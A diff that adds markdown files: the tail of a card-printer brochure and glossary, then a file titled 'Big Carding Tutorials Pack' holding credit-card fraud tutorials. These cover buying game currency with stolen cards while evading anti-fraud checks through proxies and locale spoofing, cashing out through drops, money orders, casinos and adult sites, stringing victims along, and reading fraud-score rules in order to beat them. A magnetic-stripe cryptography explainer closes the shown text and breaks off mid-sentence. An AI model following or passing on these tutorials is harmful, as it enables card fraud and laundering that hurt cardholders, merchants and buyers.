+current magnetic stripe readers "online" via telecommunications is relatively inexpensive in the U.S.
+compared to the rest of the world.
+Microprocessor
+Smart Card
+The second type of smart card contains both a microprocessor as well as memory. These cards can store
+massive amounts of information, plus the microprocessor enables the card to make its own decisions
+regarding the information stored.
+Both types of chips can be addressed by Eltron card printers since they all offer an optional smart card
+contact station. The printer brings the card into the contact station and then passes programming signals
+from an external programmer to encode the smart chip.
+Contactless smart cards utilize various RFID technologies to write and read. Many card printers print on
+these kinds of smart cards. Encoding or programming the electronic devices on these cards is typically
+accomplished by an external encoding or programming device, but contactless smart card encoders
+integrated into the card printer are becoming increasingly available.
+Card Lamination
+Various types of materials are used to protect plastic cards from abrasion, wear, fading, alteration and
+duplications. Overlay varnishes and laminate patches are the most common materials used to enhance card
+durability and security.
+Card durability has to do with how well the card withstands various forms of environmental stress. They
+include resistance to abrasion, such as passing the card through a magnetic stripe or bar code reader,
+protection from image fading when exposed to sunlight, and resistance to damage when immersed in water
+or exposed to chemicals.
+Another important factor in applications such as driver's licensing is resistance to tampering, alteration
+and/or replication. With the use of protective materials such as laminate patches with holograms, cards can
+be constructed to eliminate the potential of tampering and alteration.
+Card security means that the card can be verified for authenticity. Techniques include the application of
+overlay varnish or overlaminate materials with hologram images. Use of these materials in constructing
+cards makes replication by anyone without access to the custom hologram image materials virtually
+impossible.
+
+Material Card Life Durability Security
+Overlay Varnish Up to 2 years Minimal
+Overlay Varnish
+Up to 2 years Minimal Visual
+with Hologram
+Clear Patch
+Up to 5 years High
+Overlaminate
+Patch Overlaminate
+Up to 5 years High Visual
+with Hologram
+Overlay varnishes provide card protection, but have a much shorter life span that laminate patches - and
+offer very little security (with the exception of some hologram varnishes). Varnishes are not a solid covering
+and have multiple tiny holes in the surface, which allows the dyes to be drawn away from the card. This will
+cause the image on the card to blur and fade due to UV light, shift in color or just wear away. The life
+expectancy of a plain plastic card is up to two years.
+Laminate patches offer better protection than plain varnish, for both security and life expectancy. A patch
+laminate is, as its name implies, a polyester patch that is applied to the surface of the card after printing.
+Laminate patches, most often either .6 or 1.0 mil thick are applied via a hot roll laminating station. The life
+expectancy of a plastic card with a laminate patch is up to seven years.
+Glossary of Terms
+Access Control Cards
+Plastic cards used to gain access to premises, usually associated with magnetic stripe and proximity cards.
+Bar Code
+An array of machine-readable rectangular bars and spaces arranged in a specific way defined in
+international standards to represent letters, numbers and other human-readable symbols.
+Biometrics
+Biometrics utilize "something you are" to authenticate identification. This might include fingerprints, retina
+pattern, iris, hand geometry, vein patterns, voice password or signature dynamics. Biometrics can be used
+with a smart card to authenticate the user. The user's biometric information is stored on a smart card, the
+card is placed in a reader and a biometric scanner reads the information to match it against that on the
+card. This is a fast, accurate and highly secure form of user authentication.
+Coercivity
+A technical term used to designate how strong a magnetic field must be to affect data encoded on a
+magnetic stripe. Coercivity is measured in Oersteds (Oe). Coercivity is the measure of how difficult it is to
+encode information in a magnetic stripe.
+Color Matching
+Several color matching options are included with Fargo Card Printer/Encoders. These options are built
+directly into the printer driver so they are easily selected. Colors print with more clarity, detail and accuracy.
+Contact Smart Card Encoder
+The contact smart card encoder connects the ISO contact pins mounted on the e-card docking station to a
+Gemplus GemCore 410 smart card coupler mounted inside the printer. The GemCore 410's digital I/O is
+converted to a RS-232 signal which is accessible to application programs through a dedicated DB-9 port on
+the outside of the printer labeled "Smart Card."
+
+Contactless Smart Card Encoder
+The contactless smart card encoder connects an antenna mounted on the e-card docking station to a
+Gemplus GemEasyLink 680SL coupler mounted inside the printer/encoder. Application programs can access
+Mifare® contactless cards via a RS-232 signal through a dedicated DB-9 port on the outside of the printer
+labeled "Mifare/Contactless."
+Digital Imaging
+Scanning or otherwise capturing images which may be subsequently edited, filed, displayed or printed on a
+plastic card.
+Direct-to-Card (DTC) Printing
+The Direct-to-card printing process prints digital images directly onto any plastic card with a smooth, clean,
+glossy PVC surface.
+Dye Sublimation
+Dye sublimation is the print process Fargo Card Printer/Encoders use to print smooth, continuous-tone,
+photo-quality images. This process uses a dye-based ribbon roll that is divided into a series of color panels.
+The color panels are grouped in a repeating series of three separate colors along the length of the ribbon:
+yellow, magenta and cyan (YMC). As the ribbon and card pass simultaneously beneath the printhead,
+hundreds of thermal elements heat the dyes on the ribbon. Once the dyes are heated, they vaporize and
+diffuse into the surface of the card. Varying the heat intensity of each thermal element within the printhead
+makes it possible for each transferred dot of color to vary saturation. This blends one color into the next.
+The result is continuous-tone, photo-realistic color images.
+Docking Station
+Fargo provides an optional e-card docking station on select models that can be ordered with encoders for
+one, two or three different types of e-cards. These printer/encoders allow application software to read
+and/or store information in the memory of e-cards. The optional encoders provide everything needed for an
+application program to communicate with a specific type e-card through a standard RS-232 interface. The
+Fargo e-card docking station comes standard with the read/write pins (as defined by ISO) needed to
+communicate with contact smart cards. The e-card docking station also can be ordered with a magnetic
+stripe encoder for either an ISO magnetic stripe that supports dual high/low coercivity tracks 1, 2 and 3 or a
+JIS II magnetic stripe.
+Encoding
+The process of electronically "writing" information on magnetic stripes or smart card chips.
+E-card Encoder
+Fargo Card Printer/Encoders support reading and/or storing information in up to three different types of e-
+cards: ISO 7816 contact smart cards, Mifare® contactless smart cards and HID proximity cards.
+Edge-to-Edge
+Refers to the maximum printable area on a card. Printer/encoders with edge-to-edge printing capability can
+print just to the edge of a card resulting in printed cards with virtually no border.
+HiCo
+Abbreviation for High Coercivity. HiCo magnetic stripes provide the highest level of immunity to damage by
+stray magnetic fields. They are more difficult to encode than LoCo magnetic stripes because the encoding
+requires more power. HiCo magnetic stripe cards are slightly more expensive for this reason.
+High-Volume Printing
+Fast, efficient printing for producing large quantities of cards with minimal down time for supplies loading or
+maintenance.
+High Definition Printing™ (HDP™)
+The high-definition printing process prints full-color images onto clear HDP transfer film. The HDP film is
+then fused to the card through heat and pressure via a heated roller. This revolutionary technology
+enhances card durability and consistently produces the best card color available - even on tough-to-print
+matte-finished cards, proximity cards and smart cards.
+High-Speed Printing
+Fargo Card Printer/Encoders are among the fastest desktop card printer/encoders in the industry. High-
+speed printing allows for more efficient card production - saving time, money and resources.
+
+Hologram
+A unique photographic printing that provides a three-dimensional effect on a flat surface. Holograms cannot
+be easily copied and are used for security and aesthetic purposes on cards.
+Image Capture System
+A hardware and software system used to obtain and save personal data and cardholder photographic
+images.
+ISO Magnetic Stripe Encoder
+International Standards Organization specification for magnetic stripe encoding. The Fargo encoder supports
+dual high/low coercivity and tracks 1, 2 and 3.
+JIS II Magnetic Stripe Encoder
+Japanese Industrial Standard for magnetic stripe encoding; published and translated into English by Japan
+Standards Association.
+Lamination
+The process of combining lamination material and core material using time, heat and pressure. Laminate
+patches used in card printers come on rolls, with and without carriers/liners.
+LCD Display
+The LCD - or Liquid Crystal Display - shows the current status of the printer and changes according to the
+printer's current mode of operation. LCD communicates an error with text, which is easier to interpret than
+LED lights.
+Lockable Hopper
+Some Fargo Card Printer/Encoders provide a lockable card hopper door. This lock is intended to help prevent
+theft of your blank card stock. This feature is especially helpful if using valuable card stock such as
+preprinted cards, smart cards or cards with built-in security features such as holograms.
+LoCo
+Abbreviation for Low Coercivity. Easier to encode and slightly less expensive than HiCo magnetic stripe
+cards.
+Machine-Readable
+A code or characters that can be read by machines.
+Magnetic (“Mag”) Stripe
+Mag stripe refers to the black or brown magnetic stripe on a card. The stripe is made of magnetic particles
+of resin. The resin particle material determines the coercivity of the stripe; the higher the coercivity, the
+harder it is to encode - and erase - information from the stripe. Magnetic stripes are often used in
+applications for access control, time and attendance, lunch programs, library cards and more.
+Memory Card
+A type of smart card. Also known as a synchronous card, it features 256 bit or 32 byte memory and is
+suitable for use as a token card or identification card.
+Output Stacker
+The output stacker stores printed cards in a first-in/first-out order. This feature makes it easy to keep
+printed cards in a specific order for faster issuance or to print serialized cards.
+Oversized Cards
+Oversized cards are used for more efficient visual identification and are available in many nonstandard sizes.
+The most popular sizes are CR-90 (3.63" x 2.37"/92 mm x 60 mm) and CR-100 (3.88" x 2.63"/98.5 mm x
+67 mm).
+Overlaminate
+Protective clear or holographic material designed to offer advanced card security and durability. Two types
+are available from Fargo: Thermal Transfer Overlaminate is a .25 mil thick material that enhances card
+security and durability. PolyGuard Overlaminate is available in a 1 mil and .6 mil thick material and provides
+extraordinary protection for applications that require highly durable cards.
+
+Overlay Panel
+The clear overlay panel (O) is provided on dye sublimation print ribbons. This panel is automatically applied
+to printed cards and helps prevent images from premature wear or UV fading. All dye sublimation printed
+images must have either this overlay panel or an overlaminate applied to protect them.
+Overlay Varnish
+A thin transparent layer applied (using the print head) to cards to resist scratching and fading from
+exposure to UV radiation.
+Over-the-Edge
+Refers to the maximum printable area on a card. Printer/encoders with over-the-edge printing capability can
+print past the edge of a card resulting in printed cards with absolutely no border.
+PolyGuard™
+A card overlaminate available in 1 mil and .6 mil thicknesses that provides extraordinary card protection;
+ideal for harsh or more secure environments. Available as clear or with embedded holographic-type security
+images.
+Proximity (“Prox”) Card
+Proximity cards allow access and tracking utilizing contactless technology (usually by communicating
+through a built-in antenna).
+Prox Card Encoder
+The prox card encoder uses a HID ProxPoint® Plus reader mounted on the e-card docking station inside the
+printer/encoder. The ProxPoint is a "read only" device producing a Wiegand signal that is converted to RS-
+232 using a Cypress Computer Systems CVT-2232. Application programs can read information from HID
+prox cards via a RS-232 signal through a dedicated DB-9 port on the outside of the printer labeled "Prox."
+Resin Thermal Transfer
+Resin thermal transfer is the process used to print sharp black text and crisp bar codes that can be read by
+both infrared and visible-light bar code scanners. It is also the process used to print ultra-fast, economical
+one-color cards. Like dye sublimation, this process uses a thermal printhead to transfer color from the
+ribbon roll to the card. The difference, however, is that solid dots of color are transferred in the form of a
+resin-based ink which fuses to the surface of the card when heated. This produces very durable, single-color
+images.
+Smart Card
+Smart cards have an embedded computer circuit that contains either a memory chip or a microprocessor
+chip. There are several types of smart cards: Memory, Contact, Contactless, Hybrid (Twin), Combi (Dual
+Interface), Proximity and Vicinity.
+SmartGuard™
+SmartGuard is a printer security option that uses a custom access card and a built-in reader to restrict
+printer access. With this feature, only those with a valid access card can print cards. This makes both your
+printed cards and your overall system more secure.
+SmartShield™
+This option allows the printer/encoder to print custom, reflective security images on the card that fluoresce
+under a black or UV light source.
+Standard Cards
+The standard card size is CR-80. CR-80 dimensions are 3.375" x 2.125" (85.6 mm x 54 mm).
+Thermal Printing
+The process of creating an image on a plastic card using a heated printhead.
+Thermal Transfer Overlaminate
+A card overlaminate available in a .25 mil thickness that increases card security and durability; often used
+for moderate durability applications or when additional security (such as holographic images) are needed.
+Resolution
+Dimension of the smallest element of an image that can be printed. Usually stated as dots per inch (dpi).
+
+YMC
+Yellow, magenta and cyan are the primary print colors for cards. The three colors are combined in varying
+degrees to make a full spectrum of colors. YMCKO is the same as YMC plus black (K) and clear protective
+overcoat (O).
diff --git a/Big Carding Tutorials Pack (66 tutorials)_pdf.md b/Big Carding Tutorials Pack (66 tutorials)_pdf.md
new file mode 100644
index 0000000..c39e111
--- /dev/null
+++ b/Big Carding Tutorials Pack (66 tutorials)_pdf.md
@@ -0,0 +1,9447 @@
+# Big Carding Tutorials Pack (66 tutorials)
+
+
+---
+
+About MMORPG
+So, all it about games and game stuff.
+1. MMORPG-Store's AntiFraud & Defence System. So elementary ways of such shops protection are:
+- IP-address must be from the same state, better – city;
+- Area code in entered phone must be from the same state;
+- You’ll be invited to live chat and asked for some questions;
+- If you’re looking nor trusted in first three steps, may be call requested;
+2. About games themselves. You should know that many of game-masters don’t like that game currencies
+are selling for real money.
+So be ready that in one beautiful day you can see message like “Your account is banned. Reason is
+hacker, scammer, fraudulent etc”. So you’re under the risk when you save on account at the age of a week
+big amounts of game currencies. So don’t be lazy and enter periodically on the account and make
+visibility that you’re real gamer and you like to play. And don’t forget that if you card the currencies –
+there could be chargeback. And of course after it your accout will e blocked anyway.
+3. What you need for work.
+- good proxy-service of course with enough value of socks4/5 located in needed states/cities;
+- credit card or better paypal or more better more than one paypal – needed to be explained? I think not;
+- e-mail. It’s better don’t use e-mails like 238jerom32 @yahoo.com. Don’t be lazy to search for some
+nicer addresses: something like MMORPG-KING @INORBIT.COM или SPACEWARRIOR
+@GAMER.LA (easy.la – hundreds of free domains) или
+LINEAGEFUN @WINNING.COM.
+4. About shops and their owners. Most of popular MMORPG supermarkets belong to small yellow-skin
+people with proud of that there are 1 000 000 000 of such people on the Earth. Second place take
+Americans and the third place take nobody but it’s possible to put there people from ex-USSR. And what
+interesting that last people don’t like to serve people from their countries and they mainly targeted on
+USA and EU customers.
+So that’s the list of things you will need:
+a. Socks-service. Almost everyone knows where to find it.
+b. VPN with good encryption.
+c. Software:
+- Permeo Security Driver, Socks Chain, FreeCAP and Other Analog
+- Soft which changes OS Language,OS Regional Settings & Time Zone,Date. Browser Type & Language.
+- Trusted track-eracer removing all info without recovering possible: CyberScrub,Ashampoo
+,TICEraser,ACRONIS Privacy Suite and other analog)
+d. AIM Messenger,Yahoo Messenger for possible contact with shop’s support.
+
+All About cashing
+In this article I would like to point out some of the working at the present time means of making money
+and laundering the earnings.
+First of all what could you make money on? There are a many topics written that newbie can read,
+although most of the schemes described are non-working or very difficult to realize. The main schemes
+are:
+- Adult
+- Casino / Totalizator
+- Auctions
+Basically, many articles were written about it. In this article I am going to sum up the schemes and talk
+about the last stage of carding - what to do with those sums that you managed to make using ways
+mentioned above, to be exact v how to get cold hard cash in the palm of your hand.
+Let's start with auctions.
+I will not be talking about making sellers accounts or where to get them - I personally do not sell them so
+if you are interested in that, search the forum. I will only talk about several characteristics of working
+with accounts - i.e. what exactly you should do in order for the funds to reach the person that will turn
+them into cash and eventually get the cash to you.
+The first, and important factor of success is the amount of positive feedbacks (responses) on seller-s
+account, which is the one you-ll be using. When the person searches through the auctions for the
+merchandize to purchase he pays attention to sellers feedbacks or the lack there of. More feedbacks
+translate into more trust from your potential buyer.
+Do not overlook that after the winner is determined on your lot, you will have to communicate with the
+buyer by the means of e-mail, therefore you will need to use good English v otherwise the unnecessary
+suspicions might come into play.
+On well-known online auction site eBay there is a list of some goods that are not allowed to be put up for
+the auction, as for the rest, anything goes from socks up to washing machines.
+Now about cashing. The most effective way of getting money out of the auctions - are and always were
+checks. More precisely, not just any checks, but Money Orders and Cashier Checks. I will explain why:
+- Why not wire transfer? The account used for wire will have a really short life span, nervous buyers have
+a habit of checking when and where did their money go. Keep in mind that they will not wait for too long
+so you are risking that the deal will go sour in the very end and you will not be able to collect.
+- Why not Personal Check? Because, after sending personal check to your drop, the buyer and authorities
+can easily track and subsequently stop the payment. Same applies to different escrow services like
+BidPay.
+- Money Orders and Cashier Checks v are not checks payable to a named person, but those that you can
+buy at your local post office or the bank. Those only contain personal information if the buyer decided to
+put it there. Postal Money Orders, in particular are impossible to stop payment on.
+So now we-ve discussed the best ways of getting the money out of the auctions. Keep in mind one
+nuance: try to ?work? on the buyer who has won your auction so that he stays calm as long as possible
+about the validity of the deal. It-s in your interests: The longer your buyer remains assured of receiving
+the merchandize, the longer your drop that receives checks lives, and therefore you?ll be able to make
+more money.
+
+One more thing that is also very important to keep in mind: Make sure that the buyer is physically as far
+away as possible from your drop - quite often there are such heroes that come to the address where they
+sent the check, demanding their goods or money.
+Now we shall proceed to on-line gambling and making money on that.
+Everyone is familiar with the basic technique. The majority of schemes that are connected in one way or
+the other with working in casinos are discussed on the CarderPlanet. I will talk only about some aspects
+concerned with the final (the most important and crucial) stage - with cashing.
+After a massive attack of carders on a casino that were processed by MicroGaming (MG), they have
+ceased to send prizes on ACH as this kind of money transfer meant the name of the owner on the account
+assigned is not checked. That basically means, the casinos from MG are hardly interesting anymore,
+because the money withdrawal process has gotten to be quite complicated.
+So v does that mean that casino theme has died? Not at all v There are other casinos that are served by
+different processing companies - for example, EFS. If you dedicate some time on searching the net you
+are sure to find something
+Before working with any casino make sure not to overlook reading their policies. Find out ways of a
+withdrawal.
+After the certain sum of money was won, the initial deposit must be returned on a card. That assures that
+no one get nervous neither the card owner nor a casino. And everyone, including you, will remain
+pleased.
+Further all is clear - go to reliable cashier for drop or the account, agree about interest and send transfer or
+the check - depending on a method that this casino uses.
+Further - adult (porn-sites).
+I?d like to emphasize yet again that quite a lot was written and discussed on this subject. Don-t be lazy
+and look in archives. A huge amount of information!
+Briefly:
+1. Create a site or order one from good web designer whom you-ll find on the Planet. A well-made,
+professional site will improve your odds.
+2. Fill it with the content.
+3. Connect to billing of your choice that pays often.
+4. Make or buy traffic and start to input the card numbers.
+During this process pay special attention to changing your proxy servers. Each new card must be linked to
+a different e-mail address. Do not overlook your system setting especially the language.
+On the present day (July, 13, 2002), these are the main schemes in carding that are connected with
+cashing. There is also a merchandize carding, working with your own merchants, and working with real
+plastic - but these subjects demand considerable experience so I would not advise beginners to start with
+them, nor they are connected with cashing, nuances of which were discussed in this article.
+And, in conclusion, little about cashing and cashiers.
+
+Work only with professional and well-checked cashiers. Ideal choice - verified people. The beginner or
+not a well-known cashier, even though he might not be a fake, can simple lack professionalism in this
+subject (and believe me - in the work of cashier there is such heap of hidden dangers!)
+Antifraud systems working
+In all online shops which accept credit card was added "Credit Card Fraud Detection service" (further
+CCFDs). It's task is to percent of possibility of fraud. It counts as named fraud score (FS) based on main
+factors of legity. For example if FS higher than 2,5 it's adviced to manager to hold order or claim a call.
+Factors of fraud:
+1. E-mail Domain - they look provider of your e-mail (if it's free email provider like hotmail.com)
+2. Geographic Source-IP A country which IP belongs to and a country you're entering in the shop must be
+the same.
+3. Anonymous Proxy - if IP of customer in black list.
+4 High Risk Country - for example Russia, Ukrain, Moldova, Belorussia, Columbia, Egypt, Indonesia,
+Livan, Macedonia
+5. Distance-Расстояние - distance between IP location and shipping address.
+6. Bin Number Match - country of bank emited the card and country of IP (check by BIN).
+9-Carder E-mail - if entered e-mail is in database of famous carders.
+10-Open Proxy - check IP on public proxy
+11-Spam - checking IP in spam blacklist
+And that's the formula for counting FS:
+FS =
+2.5 * isFreeEmail +
+2.5 * countryDoesntMatch +
+5 * highRiskCountry +
+10 * min(distance,5000) / maxEarthArc +
+2 * binDoesntMatch +
+5 * carderEmail +
+2.5 * proxyScore +
+spamScore/3
+maxEarth = 20037.
+
+Applied Cryptography for Magnetic Stripe cards
+1.0 Introduction
+The intention of this document is to provide a basic understanding of cryptography and techniques
+applied to magnetic stripe cards in the financial industry.
+This subject is normally approached with some trepidation by the uninitiated, however it is reasonably
+straightforward once the basic principles are explained.
+Cryptography is complex, but its practical application is less so. It is not necessary to understand the
+mathematics involved in order to successfully use and manage cryptography in a financial environment.
+Because of the security implications of card cryptography, it is extremely hard to find information in any
+form explaining this application, which adds to the somewhat unnecessary shroud of mystery surrounding
+the topic. In early implementations, a measure of additional security was provided by ensuring that few
+people knew exactly how these mechanisms worked and this method of operation has permeated into
+today?s implementations.
+However, none of the information provided in this document will compromise security in any way.
+Although other, more secure card tokens are becoming available, the magnetic stripe card is significantly
+cheaper than alternatives, and is by far the most common card type in use. Security techniques for
+magnetic cards have slowly but steadily improved, and properly implemented can provide perfectly
+adequate security for financial transactions in a very cost-effective manner.
+2.0 Use of cryptography in financial magnetic stripe cards
+The most commonly known use of cryptography is in the provision of a Personal Identification Number,
+or PIN, to allow a magnetic stripe card to be used in unattended environments such as ATM?s, or in other
+situations where traditional signature checking is inappropriate. This applies equally to credit, debit and
+ATM cards. There are not many financial cards in use today that do not have some kind of PIN capability.
+A second common use of cryptography is in providing anti-counterfeit mechanisms for the magnetic
+stripe. The intention is to prevent fraudulent construction of counterfeit cards by inserting a value on the
+magnetic stripe that cannot be derived from other card information. Thus when a card is validated online
+this value can be checked to determine whether the card is genuine or a forgery. Several different
+standards exist for this mechanism, the most common being the VISA Card Verification Value (CVV) or
+the Mastercard equivalent, CVC. For the purposes of this document I will refer to this mechanism as
+CVV as this is the term in most common use.
+Other uses of cryptography do not directly relate to the card, they generally relate to the encryption of
+PIN?s and messages whilst being transmitted in a financial environment to prevent their disclosure or
+alteration.
+These items will be discussed in more detail in subsequent sections.
+3.0 Basic Cryptography
+
+A basic understanding of cryptographic techniques is required in order to understand this document.
+The majority of magnetic card encryption is based on the Data Encryption Algorithm (DEA), usually
+called DES or Data Encryption Standard. The idea behind DES is that a clear value is passed to the DES
+algorithm, which can be implemented either as software routines or in dedicated hardware. DES then
+encrypts the clear value using a key (a secret 64-bit value) and outputs an encrypted value.
+The unencrypted input is usually referred to as Cleartext, while the encrypted result is referred to as
+Ciphertext. The operation that turns cleartext into ciphertext is known in DES terms as an ?encipher?
+operation.
+Figure 1 - DES Encipher operation
+Note the following:
+The DES algorithm is NOT secret. It is publicly available. The Key, however, is secret.
+This process is reversible. Executing a DES ?decipher? function using the same key will convert the
+ciphertext into cleartext.
+A value encrypted with a key is generally referred to as being encrypted ?under? that key.
+The security and integrity of the whole operation depends on the secrecy of the key used. The key is a
+random value that is strictly protected and never disclosed or written down. Most of the complexity
+involved in DES cryptography systems is related to protecting, storing and transmitting keys, and these
+activities are referred to as key management.
+Note also that the DES encipher operation as described above is not foolproof. In theory, a massively
+parallel processor could derive the key in about a days processing. Much is made of this possibility in
+discussions on strengthening security, however, additional procedures can be implemented which go
+some way towards reducing the effect of this limitation.
+If we take a simple example to demonstrate this: computer logon passwords.
+Passwords used on computer systems are commonly encrypted after they have been set, and they are
+stored in a file in encrypted format. When a user signs on, the password is entered, usually in a hidden
+field, in cleartext. It is important to understand that this value is NOT compared against a value that is
+deciphered from the password file. The cleartext password in enciphered under the same key and
+compared against the enciphered value stored on the password file. Cleartext, enciphered under the same
+key, will always provide the same result, and almost all cryptographic validation compares ciphertext to
+ciphertext to avoid exposing cleartext values inside computer systems that could be compromised by
+memory dumps and so on.
+Figure 2 - Password encryption
+In this scenario however, a user of a password can always claim that his password can be exposed by
+deciphering the enciphered value, and that this is not under his control - and this is true.
+Dynamic key exchange
+Many financial systems implement dynamic key exchange. While not exclusively relating to magnetic
+stripe cards, it is relevant to include it here.
+In dynamic key exchange, two parties change keys ?on the fly? to ensure that one key is not used for an
+extended period and risks exposure. This is normally used in the financial environment where two hosts
+are exchanging financial authorisation messages - for example an acquirer bank and an issuer bank. When
+the acquirer bank forwards the PIN to the issuer bank for validation, it must do so encrypted to avoid
+
+disclosure. Obviously, the issuer will need access to the key used to encrypt the PIN so that it may be
+deciphered for validation. These keys will have been previously agreed, and may be changed using
+dynamic key exchange where keys are shipped (themselves enciphered under a ?key encryption key?) and
+changed frequently in real time for added security.
+It must be stressed that no cryptography system is ever completely secure. There are always weaknesses
+in any system, both from a technical viewpoint and operationally, where human and operational
+procedures may be compromised.
+4.0 Practical application of cryptography in Magnetic stripe cards.
+The intention of this section is to demonstrate how cryptographic principles are (usually) applied to
+magnetic stripe cards in a practical context.
+4.1 PIN Processing
+The PIN principle is based on the fact that nobody other than the legitimate cardholder has knowledge of
+the PIN. Thus when a PIN is provided for a customer:
+It must not be stored anywhere in cleartext (except in the secure PIN mailer destined for the customer)
+It must not be possible to reverse-engineer the PIN from information on the magnetic stripe or from a
+centrally held database.
+Normally, a PIN is a 4-digit numeric value. Other schemes exist, but we will use this format for
+illustration as it is a common standard.
+When a PIN is issued, the sequence of events is as follows:
+A 4-digit random number is generated. This is the PIN.
+The PIN is combined with other information, such as the account number, to create a block of data for
+input to the cryptography process.
+The input block is triple encrypted using the PIN working keys
+Digits are selected from the ciphertext result. These become the Pin Verification Value or Pin Offset.
+The PIN Offset is stored
+The PIN mailer is printed
+Memory is cleared to binary zeroes to remove all traces of the clear PIN.
+At this point, the only place the PIN value exists is inside the PIN mailer. The PIN cannot be derived
+from the PIN offset.
+When the card is used and the PIN entered, the PIN offset is calculated again from the entered PIN, using
+the PIN working keys and compared to the stored offset value to determine if the correct PIN was entered.
+Clearly this means that when a PIN is validated, the validating system must have access to the PIN
+working keys used during initial PIN issue or subsequent PIN change.
+It should be re-emphasised that the offset comprises selected digits from the ciphertext. Typically this
+would be 4-6 digits. It is not possible to recreate the keys or derive the PIN from this value.
+Notes:
+
+I.In some implementations, the PIN offset is stored on the magnetic stripe on the card. This is intended to
+be used in terminals which can perform local PIN validation. However, this technique is becoming rare as
+it prevents deployment of user-selectable PIN?s.
+II. Where the user is given the option to change PIN, the new offset is calculated in realtime and written
+to the database. Note that if the PIN is forgotten, it cannot be recreated.
+III. The method described above is generic. There are many variations, such as the IBM3624 Method-A,
+Diebold method, and so on, however the principle remains the same.
+IV. In many methods, the framework exists for using different key pairs based on an index value, usually
+stored on the magnetic stripe. This is a single digit value denoting the index of the key pair to be used.
+The intent is so that a) the same keys are not used across the entire cardbase, and c) that new keys can be
+used on re-issue without affecting existing cards.
+4.2 CVV processing
+It was quickly understood that the proliferation of financial cards exposed institutions to risk from
+counterfeiters. In the credit card world, this came from manufacture of cards with or without magnetic
+stripe encoding that possessed valid numbers and seemingly valid names and logos. In the ATM card
+arena, attackers observed PIN number entry ?over the shoulder?, collated these PIN?s with information
+from discarded receipts and so on, and constructed their own magnetic stripes on dummy cards for use at
+their leisure with observed PIN numbers.
+These threats and others led to the introduction of the Card Verification Value, a non-derivable sequence
+of digits constructed by cryptographic process and written to the magnetic stripe of the card. This means
+that electronic capture of transactions (either at ATM or Point of Sale) are effectively protected against
+counterfeiters.
+A combination of static data such as account number is triple encrypted using a special Card Verification
+key pair. Selected digits from the result are used to create the CVV, and this is written onto the magnetic
+stripe.
+Similar comments apply to CVV as those for Pin Offset; As the CVV consists of few digits, and triple
+encryption is used, the CVV keys and values are highly secure and presence of a valid CVV provides an
+added level of confidence that the card is not counterfeit.
+It should be noted that CVV is simply an additional protection method; it is not foolproof. It does not, for
+instance, protect against fraudulent captures of magnetic stripe data using, say, fake ATM?s.
+A further development of CVV, CVV2, is used for telephone authorisations. A similar (although not
+identical) calculation is performed as for CVV, and selected digits from the result are physically printed
+on the back of the card. These digits can then be requested by a call centre wishing to determine if the
+caller is really in possession of the card. Once again, this is an additional check, and not foolproof.
+4.3 Key management
+Key management relates to the storage, protection and transmission of keys. A single financial
+installation will have many DES keys, and these require careful management if they are not to become
+compromised or confused. One of the worst forms of debugging of computer faults is when cryptography
+is involved as traces and dumps are meaningless, and it can be very hard to discover that the wrong
+cryptography keys are being used!
+Keys are normally managed in hierarchies. Keys that are actually used for computation, such as PIN
+validation [working keys] are themselves stored in enciphered format under a key encryption key. Other
+
+key sets will exist for transporting keys from one location to another, such as two nodes in a network.
+These are known as transport keys.
+In good key management systems, working keys are never stored or exposed in clear format. Even when
+they are initially created, they are frequently created by automated process and never known to
+individuals.
+When initial keys are created, the 64 bits are split between two or more individuals, who then toss a coin
+once for each bit required. The two or more individuals then key in their segment of the random key
+alone, and thus no one individual ever has sight of a whole key. This method is normally used for initial
+master key generation.
+Although a simple concept, key management can become quite complex in implementation.
+In a simple ATM network for instance, a terminal master key is used to encipher working keys in transit.
+A terminal master key (TMK) is generated for each terminal, split into two halves and printed (or
+sometimes encoded on a special magnetic card). Each TMK is then installed at their respective ATM?s.
+The host system will then download terminal working keys, enciphered under the respective terminal
+master key, to each ATM. The terminal working key is then used to encipher PIN data in transit to the
+host during normal processing. If required, the terminal working key can be changed at regular intervals
+or through dynamic key exchange - but this process requires careful management.
+It should be noted that the biggest single security exposure to DES based cryptographic subsystems is in
+the exchange of keys, thus good key management procedures are paramount.
+4.4 Physical implementation
+Cryptographic processing and key management is normally performed in specialised, dedicated secure
+hardware. Although DES can be implemented entirely in software (using products such as IBM?s PCF), it
+is less secure, and the DES algorithm can be quite processor intensive.
+There are companies that specialise in dedicated cryptographic units, such as Racal and Atalla. They are
+commonly called HSM?s (Host Security Module) although this is the Racal proprietary name for the unit.
+When using these devices, the intent is that all encipher and decipher activity takes place in the secure
+unit, and that clear keys and cleartext values are never exposed outside the unit.
+Physically, HSM?s are tamper proof and intended for installation in secure computer rooms. Attempts to
+open them will result in the destruction of keys contained in the devices.
+HSM?s are also capable of generating new random keys and random numbers for use as PIN?s in a secure
+manner.
+Some applications use physical telecommunications line encryption for added security, and there are a
+variety of manufacturers of this type of device. They are effectively ?black box? and require no special
+knowledge.
+5.0 Examples
+5.1 Cryptography in a normal ATM withdrawal
+Consider a common ATM transaction:
+A customer inserts his card in the ATM
+The customer enters his PIN
+The customer requests cash
+The transaction is approved, cash is dispensed
+There?s an awful lot of cryptography going on in this process. For simplicity, we?ll assume the acquiring
+
+and issuing bank are the same.
+The cryptography activity is identified in italics in the sequence:
+1. A customer inserts his card in the ATM
+The magnetic stripe is read and stored in a buffer in the ATM
+2. The customer enters his PIN
+The PIN is entered into a tamper-proof PIN pad The stored PIN is stored in a security module in hardware
+3. The customer requests cash
+The message is constructed in the ATM The PIN (and possibly more) is enciphered under the Terminal
+key
+The message is sent to the host, possibly enciphered in comms hardware.
+On receipt at the host, the comms level encryption is deciphered The CVV is calculated and compared to
+the value on the magstripe The PIN under the Terminal key is deciphered The PIN offset or PVV is
+calculated The PIN offset or PVV is compared to the database of PVV?s
+4. The transaction is approved, cash is dispensed
+Note: all the host cryptography functions are normally performed in the Host Security module. No
+Cleartext values are exposed to application programs or outside the secure environment.
+5.2 Cryptography in an EFTPoS transaction
+Even in a signature authorised environment, the CVV from the magnetic stripe can be validated at the
+host system to detect counterfeit cards. Clearly this only works in online environments as the CVV
+validation requires a cryptographic calculation to be performed at the host.
+[Note: It is possible, and some manufacturers support, local key storage on EFTPoS devices and
+distributed terminals. Because of the key management complications, these devices are not considered
+here]
+A more common use of cryptography in EFTPoS environments (and, increasingly in ATM and other
+traffic) is the MAC (Message Authentication Code). The MAC check can be thought of as a value
+calculated from the contents of all the critical fields in a message (such as card number and amount) and
+passed through a cryptographic algorithm. Although the message is carried over transmission lines in
+clear, the validation of the MAC field at the recipient will determine whether fields have been tampered
+with. [for the technically minded, MAC can be thought of as an encrypted LRC field]. The overhead of
